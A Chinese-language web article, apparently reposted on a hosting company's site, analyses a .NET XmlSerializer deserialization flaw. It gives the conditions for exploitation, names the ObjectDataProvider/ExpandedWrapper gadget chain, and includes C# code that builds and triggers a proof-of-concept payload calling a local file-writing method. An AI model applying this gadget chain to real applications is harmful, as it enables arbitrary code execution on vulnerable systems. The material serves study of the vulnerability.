小编今天带大家了解.Net反序列化漏洞XmlSerializer的示例分析，文中知识点介绍的非常详细。觉得有帮助的朋友可以跟着小编一起浏览文章的内容，希望能够帮助更多想解决这个问题的朋友找到问题的答案，下面跟着小编一起深入学习“.Net反序列化漏洞XmlSerializer的示例分析”的知识吧。

创新互联专注于中大型企业的网站建设、成都做网站和网站改版、网站营销服务，追求商业策划与数据分析、创意艺术与技术开发的融合，累计客户超过千家，服务满意度达97%。帮助广大客户顺利对接上互联网浪潮，准确优选出符合自己需要的互联网运用，我们将一直专注品牌网站制作和互联网程序开发，在前进的路上，与客户一起成长！

条件：

1. 初始化对象时，类型可控：new XmlSerializer(type可控)

2. 反序列化对象时，输入内容可控：serializer.Deserialize(fi可控)

两个关键类：ObjectDataProvider, ExpandedWrapper

//PresentationFramework.dll  v4.0.0.0
System.Windows.Data.ObjectDataProvider

//System.Data.Services.dll   v4.0.0.0
System.Data.Services.Internal.ExpandedWrapper

Payload生成：

        public static void serializeObjectWithXmlSer()
        {
            ExpandedWrapper eobj = new ExpandedWrapper();
            XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper));
            eobj.ProjectedProperty0 = new ObjectDataProvider();
            eobj.ProjectedProperty0.ObjectInstance = new Class2();
            eobj.ProjectedProperty0.MethodName = "writeFile";
            eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");
            eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");

            TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt");
            serializer.Serialize(fo, eobj);
            fo.Close();
        }

触发Payload：

        public static void deserializeObjectWithXmlSer()
        {
            XmlSerializer ser = new XmlSerializer(typeof(ExpandedWrapper));
            TextReader fi = new StreamReader("d:/tmp/xmlser.txt");
            ser.Deserialize(fi);
            fi.Close();
        }

感谢大家的阅读，以上就是“.Net反序列化漏洞XmlSerializer的示例分析”的全部内容了，学会的朋友赶紧操作起来吧。相信创新互联小编一定会给大家带来更优质的文章。谢谢大家对创新互联网站的支持！

另外有需要云服务器可以了解下创新互联scvps.cn，海内外云服务器15元起步，三天无理由+7*72小时售后在线，公司持有idc许可证，提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案，具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势，专为企业上云打造定制，能够满足用户丰富、多元化的应用场景需求。

文章名称：.Net反序列化漏洞XmlSerializer的示例分析-创新互联
标题来源：http://scgulin.cn/article/ihjdj.html